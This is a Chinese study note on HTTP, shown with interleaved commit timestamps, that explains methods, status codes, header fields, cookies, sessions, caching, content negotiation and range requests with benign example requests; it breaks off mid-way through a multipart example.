CS-Notes/notes/HTTP.md

1045 lines
45 KiB
Markdown
Raw Normal View History

2018-06-04 14:28:30 +08:00
# 一 、基础概念
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## Web 基础
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- WWWWorld Wide Web的三种技术HTML、HTTP、URL
- HTMLHyperText Markup Language超文本标记语言
- HTTPHyperText Transfer Protocol超文本传输协议
- RFCRequest for Comments征求修正意见书互联网的设计文档。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## URL
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- URIUniform Resource Indentifier统一资源标识符
- URLUniform Resource Locator统一资源定位符
- URNUniform Resource Name统一资源名称例如 urn:isbn:0-486-27557-4。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
URI 包含 URL  URN目前 WEB 只有 URL 比较流行所以见到的基本都是 URL。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<img src="index_files/f716427a-94f2-4875-9c86-98793cf5dcc3.jpg" width="400"/>
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 请求和响应报文
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 1. 请求报文
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<img src="index_files/HTTP_RequestMessageExample.png" width=""/>
### 2. 响应报文
<img src="index_files/HTTP_ResponseMessageExample.png" width=""/>
# 二、HTTP 方法
客户端发送的 **请求报文** 第一行为请求行,包含了方法字段。
## GET
> 获取资源
当前网络请求中绝大部分使用的是 GET 方法。
## HEAD
> 获取报文首部
 GET 方法一样但是不返回报文实体主体部分。
主要用于确认 URL 的有效性以及资源更新的日期时间等。
## POST
> 传输实体主体
POST 主要用来传输数据 GET 主要用来获取资源。
更多 POST  GET 的比较请见第八章。
## PUT
> 上传文件
2018-04-06 22:46:59 +08:00
由于自身不带验证机制,任何人都可以上传文件,因此存在安全性问题,一般不使用该方法。
```html
2018-06-04 14:28:30 +08:00
PUT /new.html HTTP/1.1
Host: example.com
Content-type: text/html
Content-length: 16
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<p>New File</p>
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
## PATCH
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
> 对资源进行部分修改
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
PUT 也可以用于修改资源但是只能完全替代原始资源PATCH 允许部分修改。
2018-04-06 22:46:59 +08:00
```html
2018-06-04 14:28:30 +08:00
PATCH /file.txt HTTP/1.1
Host: www.example.com
Content-Type: application/example
If-Match: "e0023aa4e"
Content-Length: 100
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
[description of changes]
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
## DELETE
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
> 删除文件
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
 PUT 功能相反并且同样不带验证机制。
2018-04-06 22:46:59 +08:00
```html
2018-06-04 14:28:30 +08:00
DELETE /file.html HTTP/1.1
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
## OPTIONS
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
> 查询支持的方法
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
查询指定的 URL 能够支持的方法。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
会返回 Allow: GET, POST, HEAD, OPTIONS 这样的内容。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## CONNECT
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
> 要求用隧道协议连接代理
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
要求在与代理服务器通信时建立隧道使用 SSLSecure Sockets Layer安全套接层 TLSTransport Layer Security传输层安全协议把通信内容加密后经网络隧道传输。
2018-04-06 22:46:59 +08:00
```html
2018-06-04 14:28:30 +08:00
CONNECT www.example.com:443 HTTP/1.1
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
<img src="index_files/dc00f70e-c5c8-4d20-baf1-2d70014a97e3.jpg" width=""/>
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## TRACE
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
> 追踪路径
2018-04-06 22:46:59 +08:00
服务器会将通信路径返回给客户端。
2018-06-04 14:28:30 +08:00
发送请求时 Max-Forwards 首部字段中填入数值每经过一个服务器就会减 1当数值为 0 时就停止传输。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
通常不会使用 TRACE并且它容易受到 XST 攻击Cross-Site Tracing跨站追踪因此更不会去使用它。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
# 三、HTTP 状态码
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
服务器返回的 **响应报文** 中第一行为状态行,包含了状态码以及原因短语,用来告知客户端请求的结果。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
| 状态码 | 类别 | 原因短语 |
| :---: | :---: | :---: |
| 1XX | Informational信息性状态码 | 接收的请求正在处理 |
| 2XX | Success成功状态码 | 请求正常处理完毕 |
| 3XX | Redirection重定向状态码 | 需要进行附加操作以完成请求 |
| 4XX | Client Error客户端错误状态码 | 服务器无法处理请求 |
| 5XX | Server Error服务器错误状态码 | 服务器处理请求出错 |
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 1XX 信息
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **100 Continue**:表明到目前为止都很正常,客户端可以继续发送请求或者忽略这个响应。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 2XX 成功
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **200 OK**
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **204 No Content**:请求已经成功处理,但是返回的响应报文不包含实体的主体部分。一般在只需要从客户端往服务器发送信息,而不需要返回数据时使用。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **206 Partial Content**表示客户端进行了范围请求。响应报文包含由 Content-Range 指定范围的实体内容。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 3XX 重定向
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **301 Moved Permanently**:永久性重定向
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **302 Found**:临时性重定向
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **303 See Other** 302 有着相同的功能但是 303 明确要求客户端应该采用 GET 方法获取资源。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- 虽然 HTTP 协议规定 301、302 状态下重定向时不允许把 POST 方法改成 GET 方法但是大多数浏览器都会在 301、302  303 状态下的重定向把 POST 方法改成 GET 方法。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **304 Not Modified**如果请求报文首部包含一些条件例如If-MatchIf-Modified-SinceIf-None-MatchIf-RangeIf-Unmodified-Since如果不满足条件则服务器会返回 304 状态码。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **307 Temporary Redirect**临时重定向 302 的含义类似但是 307 要求浏览器不会把重定向请求的 POST 方法改成 GET 方法。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 4XX 客户端错误
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **400 Bad Request**:请求报文中存在语法错误。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **401 Unauthorized**该状态码表示发送的请求需要有认证信息BASIC 认证、DIGEST 认证。如果之前已进行过一次请求则表示用户认证失败。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **403 Forbidden**:请求被拒绝,服务器端没有必要给出拒绝的详细理由。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **404 Not Found**
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 5XX 服务器错误
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **500 Internal Server Error**:服务器正在执行请求时发生错误。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- **503 Service Unavilable**:服务器暂时处于超负载或正在进行停机维护,现在无法处理请求。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
# 四、HTTP 首部
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
 4 种类型的首部字段通用首部字段、请求首部字段、响应首部字段和实体首部字段。
2018-04-06 22:46:59 +08:00
各种首部字段及其含义如下(不需要全记,仅供查阅):
2018-06-04 14:28:30 +08:00
## 通用首部字段
| 首部字段名 | 说明 |
| :--: | :--: |
| Cache-Control | 控制缓存的行为 |
| Connection | 控制不再转发给代理的首部字段、管理持久连接|
| Date | 创建报文的日期时间 |
| Pragma | 报文指令 |
| Trailer | 报文末端的首部一览 |
| Transfer-Encoding | 指定报文主体的传输编码方式 |
| Upgrade | 升级为其他协议 |
| Via | 代理服务器的相关信息 |
| Warning | 错误通知 |
## 请求首部字段
| 首部字段名 | 说明 |
| :--: | :--: |
| Accept | 用户代理可处理的媒体类型 |
| Accept-Charset | 优先的字符集 |
| Accept-Encoding | 优先的内容编码 |
| Accept-Language | 优先的语言(自然语言) |
| Authorization | Web 认证信息 |
| Expect | 期待服务器的特定行为 |
| From | 用户的电子邮箱地址 |
| Host | 请求资源所在服务器 |
| If-Match | 比较实体标记ETag |
| If-Modified-Since | 比较资源的更新时间 |
| If-None-Match | 比较实体标记 If-Match 相反 |
| If-Range | 资源未更新时发送实体 Byte 的范围请求 |
| If-Unmodified-Since | 比较资源的更新时间 If-Modified-Since 相反 |
| Max-Forwards | 最大传输逐跳数 |
| Proxy-Authorization | 代理服务器要求客户端的认证信息 |
| Range | 实体的字节范围请求 |
| Referer | 对请求中 URI 的原始获取方 |
| TE | 传输编码的优先级 |
| User-Agent | HTTP 客户端程序的信息 |
## 响应首部字段
| 首部字段名 | 说明 |
| :--: | :--: |
| Accept-Ranges | 是否接受字节范围请求 |
| Age | 推算资源创建经过时间 |
| ETag | 资源的匹配信息 |
| Location | 令客户端重定向至指定 URI |
| Proxy-Authenticate | 代理服务器对客户端的认证信息 |
| Retry-After | 对再次发起请求的时机要求 |
| Server | HTTP 服务器的安装信息 |
| Vary | 代理服务器缓存的管理信息 |
| WWW-Authenticate | 服务器对客户端的认证信息 |
## 实体首部字段
| 首部字段名 | 说明 |
| :--: | :--: |
| Allow | 资源可支持的 HTTP 方法 |
| Content-Encoding | 实体主体适用的编码方式 |
| Content-Language | 实体主体的自然语言 |
| Content-Length | 实体主体的大小 |
| Content-Location | 替代对应资源的 URI |
| Content-MD5 | 实体主体的报文摘要 |
| Content-Range | 实体主体的位置范围 |
| Content-Type | 实体主体的媒体类型 |
| Expires | 实体主体过期的日期时间 |
| Last-Modified | 资源的最后修改日期时间 |
# 五、具体应用
## Cookie
HTTP 协议是无状态的主要是为了让 HTTP 协议尽可能简单使得它能够处理大量事务。HTTP/1.1 引入 Cookie 来保存状态信息。
Cookie 是服务器发送到用户浏览器并保存在本地的一小块数据它会在浏览器下次向同一服务器再发起请求时被携带并发送到服务器上。它用于告知服务端两个请求是否来自同一浏览器并保持用户的登录状态。
### 1. 用途
- 会话状态管理(如用户登录状态、购物车、游戏分数或其它需要记录的信息)
- 个性化设置(如用户自定义设置、主题等)
- 浏览器行为跟踪(如跟踪分析用户行为等)
Cookie 曾一度用于客户端数据的存储因为当时并没有其它合适的存储办法而作为唯一的存储手段但现在随着现代浏览器开始支持各种各样的存储方式Cookie 渐渐被淘汰。由于服务器指定 Cookie 浏览器的每次请求都会携带 Cookie 数据会带来额外的性能开销尤其是在移动环境下。新的浏览器 API 已经允许开发者直接将数据存储到本地如使用 Web storage API 本地存储和会话存储 IndexedDB。
### 2. 创建过程
服务器发送的响应报文包含 Set-Cookie 首部字段客户端得到响应报文后把 Cookie 内容保存到浏览器中。
2018-04-06 22:46:59 +08:00
```html
2018-06-04 14:28:30 +08:00
HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: yummy_cookie=choco
Set-Cookie: tasty_cookie=strawberry
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
[page content]
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
客户端之后对同一个服务器发送请求时会从浏览器中读出 Cookie 信息通过 Cookie 请求首部字段发送给服务器。
2018-04-06 22:46:59 +08:00
```html
2018-06-04 14:28:30 +08:00
GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
### 3. 分类
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- 会话期 Cookie浏览器关闭之后它会被自动删除也就是说它仅在会话期内有效。
- 持久性 Cookie指定一个特定的过期时间Expires或有效期Max-Age之后就成为了持久性的 Cookie。
2018-04-06 22:46:59 +08:00
```html
2018-06-04 14:28:30 +08:00
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT;
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
### 4. JavaScript 获取 Cookie
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
通过 `Document.cookie` 属性可创建新的 Cookie也可通过该属性访问非 HttpOnly 标记的 Cookie。
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
document.cookie = "yummy_cookie=choco";
document.cookie = "tasty_cookie=strawberry";
2018-05-08 22:59:42 +08:00
console.log(document.cookie);
```
2018-06-04 14:28:30 +08:00
### 5. Secure  HttpOnly
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
标记为 Secure  Cookie 只应通过被 HTTPS 协议加密过的请求发送给服务端。但即便设置了 Secure 标记敏感信息也不应该通过 Cookie 传输因为 Cookie 有其固有的不安全性Secure 标记也无法提供确实的安全保障。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
标记为 HttpOnly  Cookie 不能被 JavaScript 脚本调用。因为跨域脚本 (XSS) 攻击常常使用 JavaScript  `Document.cookie` API 窃取用户的 Cookie 信息因此使用 HttpOnly 标记可以在一定程度上避免 XSS 攻击。
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly
2018-05-08 22:59:42 +08:00
```
2018-06-04 14:28:30 +08:00
### 6. 作用域
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
Domain 标识指定了哪些主机可以接受 Cookie。如果不指定默认为当前文档的主机不包含子域名。如果指定了 Domain则一般包含子域名。例如如果设置 Domain=mozilla.org Cookie 也包含在子域名中 developer.mozilla.org
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
Path 标识指定了主机下的哪些路径可以接受 Cookie URL 路径必须存在于请求 URL 。以字符 %x2F ("/") 作为路径分隔符子路径也会被匹配。例如设置 Path=/docs则以下地址都会匹配
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- /docs
- /docs/Web/
- /docs/Web/HTTP
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 7. Session
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
除了可以将用户信息通过 Cookie 存储在用户浏览器中也可以利用 Session 存储在服务器端存储在服务器端的信息更加安全。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
Session 可以存储在服务器上的文件、数据库或者内存中现在最常见的是将 Session 存储在内存型数据库中比如 Redis。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
使用 Session 维护用户登录的过程如下
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- 用户进行登录时用户提交包含用户名和密码的表单放入 HTTP 请求报文中
- 服务器验证该用户名和密码;
- 如果正确则把用户信息存储到 Redis 它在 Redis 中的 ID 称为 Session ID
- 服务器返回的响应报文的 Set-Cookie 首部字段包含了这个 Session ID客户端收到响应报文之后将该 Cookie 值存入浏览器中
- 客户端之后对同一个服务器进行请求时会包含该 Cookie 服务器收到之后提取出 Session ID Redis 中取出用户信息继续之后的业务操作。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
应该注意 Session ID 的安全性问题不能让它被恶意攻击者轻易获取那么就不能产生一个容易被猜到的 Session ID 值。此外还需要经常重新生成 Session ID。在对安全性要求极高的场景下例如转账等操作除了使用 Session 管理用户状态之外还需要对用户进行重新验证比如重新输入密码或者使用短信验证码等方式。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
### 8. 浏览器禁用 Cookie
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
此时无法使用 Cookie 来保存用户信息只能使用 Session。除此之外不能再将 Session ID 存放到 Cookie 而是使用 URL 重写技术 Session ID 作为 URL 的参数进行传递。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
### 9. Cookie  Session 选择
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
- Cookie 只能存储 ASCII 码字符串 Session 则可以存取任何类型的数据因此在考虑数据复杂性时 首选 Session
- Cookie 存储在浏览器中容易被恶意查看。如果非要将一些隐私数据存在 Cookie 可以将 Cookie 值进行加密然后在服务器进行解密
- 对于大型网站如果用户所有的信息都存储在 Session 那么开销是非常大的因此不建议将所有的用户信息都存储到 Session 中。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 缓存
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 1. 优点
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- 缓解服务器压力;
- 减低客户端获取资源的延迟(缓存资源比服务器上的资源离客户端更近)。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 2. 实现方法
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- 让代理服务器进行缓存;
- 让客户端浏览器进行缓存。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 3. Cache-Control
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
HTTP/1.1 通过 Cache-Control 首部字段来控制缓存。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
**(一)禁止进行缓存**
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
no-store 指令规定不能对请求或响应的任何一部分进行缓存。
2018-04-06 22:46:59 +08:00
```html
2018-06-04 14:28:30 +08:00
Cache-Control: no-store
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
**(二)强制确认缓存**
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
no-cache 指令规定缓存服务器需要先向源服务器验证缓存资源的有效性只有当缓存资源有效才将能使用该缓存对客户端的请求进行响应。
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
Cache-Control: no-cache
2018-05-08 22:59:42 +08:00
```
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
**(三)私有缓存和公共缓存**
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
private 指令规定了将资源作为私有缓存只能被单独用户所使用一般存储在用户浏览器中。
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
Cache-Control: private
2018-05-08 22:59:42 +08:00
```
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
public 指令规定了将资源作为公共缓存可以被多个用户所使用一般存储在代理服务器中。
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
Cache-Control: public
2018-05-08 22:59:42 +08:00
```
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
**(四)缓存过期机制**
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
max-age 指令出现在请求报文中并且缓存资源的缓存时间小于该指令指定的时间那么就能接受该缓存。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
max-age 指令出现在响应报文中表示缓存资源在缓存服务器中保存的时间。
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
Cache-Control: max-age=31536000
2018-05-08 22:59:42 +08:00
```
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
Expires 字段也可以用于告知缓存服务器该资源什么时候会过期。在 HTTP/1.1 会优先处理 Cache-Control : max-age 指令而在 HTTP/1.0 Cache-Control : max-age 指令会被忽略掉。
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
Expires: Wed, 04 Jul 2012 08:26:05 GMT
2018-05-08 22:59:42 +08:00
```
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 4. 缓存验证
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
需要先了解 ETag 首部字段的含义它是资源的唯一表示。URL 不能唯一表示资源例如 `http://www.google.com/` 有中文和英文两个资源只有 ETag 才能对这两个资源进行唯一表示。
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
ETag: "82e22293907ce725faf67773957acd12"
2018-05-08 22:59:42 +08:00
```
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
可以将缓存资源的 ETag 值放入 If-None-Match 首部服务器收到该请求后判断缓存资源的 ETag 值和资源的最新 ETag 值是否一致如果一致则表示缓存资源有效返回 304 Not Modified。
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
If-None-Match: "82e22293907ce725faf67773957acd12"
2018-05-08 22:59:42 +08:00
```
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
Last-Modified 首部字段也可以用于缓存验证它包含在源服务器发送的响应报文中指示源服务器对资源的最后修改时间。但是它是一种弱校验器因为只能精确到一秒所以它通常作为 ETag 的备用方案。如果响应首部字段里含有这个信息客户端可以在后续的请求中带上 If-Modified-Since 来验证缓存。服务器只在所请求的资源在给定的日期时间之后对内容进行过修改的情况下才会将资源返回状态码为 200 OK。如果请求的资源从那时起未经修改那么返回一个不带有消息主体的 304 Not Modified 响应
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
Last-Modified: Wed, 21 Oct 2015 07:28:00 GMT
2018-05-08 22:59:42 +08:00
```
2018-04-06 22:46:59 +08:00
```html
2018-06-04 14:28:30 +08:00
If-Modified-Since: Wed, 21 Oct 2015 07:28:00 GMT
2018-05-08 22:59:42 +08:00
```
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 连接管理
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<img src="index_files/HTTP1_x_Connections.png" width="800"/>
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 1. 短连接与长连接
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
当浏览器访问一个包含多张图片的 HTML 页面时除了请求访问 HTML 页面资源还会请求图片资源如果每进行一次 HTTP 通信就要断开一次 TCP 连接连接建立和断开的开销会很大。长连接只需要建立一次 TCP 连接就能进行多次 HTTP 通信。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
HTTP/1.1 开始默认是长连接的如果要断开连接需要由客户端或者服务器端提出断开使用 Connection : close而在 HTTP/1.1 之前默认是短连接的如果需要长连接则使用 Connection : Keep-Alive。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
### 2. 流水线
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
默认情况下HTTP 请求是按顺序发出的下一个请求只有在当前请求收到应答过后才会被发出。由于会受到网络延迟和带宽的限制在下一个请求被发送到服务器之前可能需要等待很长时间。
2018-05-08 22:59:42 +08:00
2018-05-26 22:05:34 +08:00
流水线是在同一条长连接上发出连续的请求,而不用等待响应返回,这样可以避免连接延迟。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
## 内容协商
2018-05-08 22:59:42 +08:00
通过内容协商返回最合适的内容,例如根据浏览器的默认语言选择返回中文界面还是英文界面。
2018-06-04 14:28:30 +08:00
### 1. 类型
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
**(一)服务端驱动型内容协商**
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
客户端设置特定的 HTTP 首部字段例如 Accept、Accept-Charset、Accept-Encoding、Accept-Language、Content-Languag服务器根据这些字段返回特定的资源。
2018-05-08 22:59:42 +08:00
它存在以下问题:
2018-06-04 14:28:30 +08:00
- 服务器很难知道客户端浏览器的全部信息;
- 客户端提供的信息相当冗长HTTP/2 协议的首部压缩机制缓解了这个问题并且存在隐私风险HTTP 指纹识别技术
- 给定的资源需要返回不同的展现形式,共享缓存的效率会降低,而服务器端的实现会越来越复杂。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
**(二)代理驱动型协商**
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
服务器返回 300 Multiple Choices 或者 406 Not Acceptable客户端从中选出最合适的那个资源。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
### 2. Vary
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
Vary: Accept-Language
2018-04-06 22:46:59 +08:00
```
2018-05-08 22:59:42 +08:00
在使用内容协商的情况下,只有当缓存服务器中的缓存满足内容协商条件时,才能使用该缓存,否则应该向源服务器请求该资源。
2018-06-04 14:28:30 +08:00
例如一个客户端发送了一个包含 Accept-Language 首部字段的请求之后源服务器返回的响应包含 `Vary: Accept-Language` 内容缓存服务器对这个响应进行缓存之后在客户端下一次访问同一个 URL 资源并且 Accept-Language 与缓存中的对应的值相同时才会返回该缓存。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
## 内容编码
2018-05-08 22:59:42 +08:00
内容编码将实体主体进行压缩从而减少传输的数据量。常用的内容编码有gzip、compress、deflate、identity。
2018-06-04 14:28:30 +08:00
浏览器发送 Accept-Encoding 首部其中包含有它所支持的压缩算法以及各自的优先级服务器则从中选择一种使用该算法对响应的消息主体进行压缩并且发送 Content-Encoding 首部来告知浏览器它选择了哪一种算法。由于该内容协商过程是基于编码类型来选择资源的展现形式的在响应中Vary 首部中至少要包含 Content-Encoding这样的话缓存服务器就可以对资源的不同展现形式进行缓存。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
## 范围请求
2018-04-06 22:46:59 +08:00
2018-05-26 22:05:34 +08:00
如果网络出现中断,服务器只发送了一部分数据,范围请求可以使得客户端只请求服务器未发送的那部分数据,从而避免服务器重新发送所有数据。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
### 1. Range
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
在请求报文中添加 Range 首部字段指定请求的范围。
2018-04-06 22:46:59 +08:00
```html
2018-06-04 14:28:30 +08:00
GET /z4d4kWk.jpg HTTP/1.1
Host: i.imgur.com
Range: bytes=0-1023
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
请求成功的话服务器返回的响应包含 206 Partial Content 状态码。
2018-05-08 22:59:42 +08:00
2018-04-06 22:46:59 +08:00
```html
2018-06-04 14:28:30 +08:00
HTTP/1.1 206 Partial Content
Content-Range: bytes 0-1023/146515
Content-Length: 1024
2018-04-06 22:46:59 +08:00
...
2018-06-04 14:28:30 +08:00
(binary content)
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
### 2. Accept-Ranges
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
响应首部字段 Accept-Ranges 用于告知客户端是否能处理范围请求可以处理使用 bytes否则使用 none。
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
Accept-Ranges: bytes
2018-05-08 22:59:42 +08:00
```
2018-06-04 14:28:30 +08:00
### 3. 响应状态码
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
- 在请求成功的情况下服务器会返回 206 Partial Content 状态码。
- 在请求的范围越界的情况下服务器会返回 416 Requested Range Not Satisfiable 状态码。
- 在不支持范围请求的情况下服务器会返回 200 OK 状态码。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
## 分块传输编码
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
Chunked Transfer Coding可以把数据分割成多块让浏览器逐步显示页面。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
## 多部分对象集合
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
一份报文主体内可含有多种类型的实体同时发送每个部分之间用 boundary 字段定义的分隔符进行分隔每个部分都可以有首部字段。
2018-05-08 22:59:42 +08:00
例如,上传多个表单时可以使用如下方式:
```html
2018-06-04 14:28:30 +08:00
Content-Type: multipart/form-data; boundary=AaB03x
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
--AaB03x
